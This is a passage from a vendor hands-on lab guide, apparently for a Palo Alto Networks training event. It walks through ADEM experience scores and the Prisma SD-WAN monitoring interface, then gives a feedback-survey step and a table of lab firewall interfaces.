more data.

Step 2. Scroll down to see the overall Experience Score and the Experience Score Across Network,
where you can get a quick sense of whether any users are impacted by different issues. You can also see
the Experience Score for the monitored applications.

Step 3. Navigate to ADEM > Applications where you can take a closer look at the traffic distribution and
the application experience scores monitored by ADEM.

Step 4. Click on any application to review the experience score trend for the application and the
experience score across the network.

Step 5. Navigate to Users and Prisma Access Locations to further explore what ADEM can bring to
you.

In the next task we will take a quick look at the other major component in the Prisma SASE solution,
Prisma SD-WAN.

Task 4 – Prisma SD-WAN

Prisma SD-WAN is a core component in delivering Secure Access Service Edge (SASE) for the modern
enterprise. At the core of the system is the application performance engine. Prisma SD-WAN provides a
software-defined, wide area network (SD-WAN) solution that transforms legacy wide area networks
(WANs) into a radically simplified, secure, application fabric (AppFabric), virtualizing heterogeneous
underlying transports into a unified hybrid WAN.

The Prisma SD-WAN solution includes two key elements:

SD-WAN Controller - Access the SD-WAN controller through an intuitive graphical user interface that
helps you manage your network.

ION Devices – ION (Instant-On Network) devices enable you to combine disparate WAN networks, such
as MPLS, LTE, and internet links, into a single, high-performance, hybrid wide area network (WAN).

The Prisma SD-WAN web interface is the starting point for all Prisma SD-WAN-related tasks and activities
for your enterprise. Through the web interface, you can set up, administer, monitor, and troubleshoot
sites, devices, networks, and applications. You can monitor application performance on all networks, and
secure and control applications and networks through network and security policies. You can also isolate
and troubleshoot issues within the network through the alerts and alarms.

The Prisma SD-WAN web interface contains six key tabs to configure, monitor, and troubleshoot your
wide area network and its applications – Dashboard, Map, Policies, Activity, Reports, and
CloudBlades. We will take a quick look at the Prisma SD-WAN web interface here.

Step 1. In the Prisma Access GUI, go to All Applications in the lower left-hand corner, switch to the
Prisma SD-WAN application and select the first instance.

Step 2. Once you have switched to the Prisma SD-WAN application, you should be placed in the Monitor
> Summary view. If not, Monitor is the first icon on the left.

The Dashboard and Link Quality Details dashboards give you visibility into the device connectivity
status for all the sites. The Link Quality Details metrics dashboard provides a snapshot of the current
state of the links that you are monitoring. You gain insight into the Link MOS (Mean Opinion Score), Link
Packet Loss, Link Jitter, and Link Latency from the dashboard.

Step 3. To see all the sites in the SD-WAN network, click on Sites in Monitor. In Map view, zoom out to
see the other sites. Or switch to the List View to view the list of sites.

Step 4. Click on the New York (Branch1) or the Chicago (Branch2) site to open the Site Summary
dashboard. The site summary dashboard provides an information-rich display of branch-related
metrics. These include new metrics such as network health as well as existing network, device and
application metrics.

The Site Health Overview widget contains the Current Best Health Score and the Overall Site
Consumed Bandwidth. Each of these metrics has a time series view that is displayed upon clicking.

The Current Overall Consumed Bandwidth metric displays current total bandwidth consumption, with
ingress and egress bandwidth consumption as a raw value and as a percentage of the total available.
Upon clicking the tab, a time series chart of the ingress and egress consumed bandwidth is displayed in
reference to the total configured bandwidth at the site.

The Circuit Connectivity And Health widget displays the time-series graphs for the health score of the
best performing tunnel and the circuit bandwidth utilization between the configured ingress/egress and the
actual ingress/egress over time.

Scroll down to see what other important information is available to you in the Site Summary
dashboard.

Next we will go to the Activity tab under Monitor to take a closer look at the network and individual
applications across the different sites.

Step 5. Go to the Activity tab, select Network if not already selected.

The Activity tab provides a view of the activity charts of the network and individual applications through
network analytics, media analytics, link quality, flow browser, routing statistics, and system information
related data.

You can use Quick Filters on the left to drill down into traffic per site, per request, and per WAN path.
Quick filters provide a way to display granular analytics on the network or its applications.

Step 6. In the left-hand column, under Quick Filters, click the pencil icon for Apps and Sites to edit and
select an application and site. A pop-up window will prompt you to update the charts; choose Not Yet
until you have finished selecting, then select Update to update the charts when you are done with your
selections.

This is just a quick and short introduction to Prisma SD-WAN. We invite you to look at this short Prisma
SD-WAN demonstration video to learn more about Prisma SD-WAN.

https://www.youtube.com/watch?v=lJIwL7iAsks

Palo Alto Networks also offers an Ultimate Test Drive for Secure Access Service Edge (SASE) where you
can learn more about the different use cases with Prisma Access and Prisma SD-WAN. Please talk with
your instructor if you are interested in learning more about Prisma SASE.

End of Activity 7

Activity 8 - Feedback on Ultimate Test Drive
Thank you for attending the Ultimate Test Drive event. We hope you enjoyed the presentation and the
labs that we have prepared for you. Please take a few minutes to complete the online survey form to tell
us what you think about this event.

Task 1 – Take the online survey

Step 1: In your lab environment, click on the Survey tab on the left.

Step 2: Please complete the survey and let us know what you think about this event.

End of Activity 8

Lab Setup

Firewall: VM-Series

Interface       Int Type   IP Address      Connects to Zone
Management      -          10.30.21.1      -
Ethernet 1/1    L3         172.16.2.1      Untrust
Ethernet 1/2    L3         10.80.2.1       Intranet
Ethernet 1/3    L3         192.168.21.1    Trust
Ethernet 1/4    Tap        -               Tap (Not used)
